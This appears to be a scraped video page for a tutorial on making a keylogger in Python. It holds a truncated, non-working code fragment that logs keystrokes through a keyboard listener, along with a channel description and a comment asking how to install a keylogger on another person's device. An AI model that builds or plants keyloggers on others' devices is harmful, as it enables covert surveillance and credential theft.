how to make a keylogger in python

preview_player
Показать описание
In this video i will show you how to make a keylogger in python. watch this video till end
KeyLogger Code:
import logging
log_dir = ""
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
with Listener(on_press=on_press) as listener:

HaiderTech Provides all latest technical and other development videos, in these videos especially includes, Kali Linux Learning tutorials, Windows Tutorials, Ethical hacking, Python Programming, C Programming, Huawei HCIA R& S, Cisco networking , CCNA, Mathematics, English grammar, IOT, Raspberry Pi tutorials, Windows servers configuration, Technology news, and motivational Speeches, English and Urdu language
Рекомендации по теме
Комментарии
Автор

i already have a keylogger, but how would i put it on another device?

gambit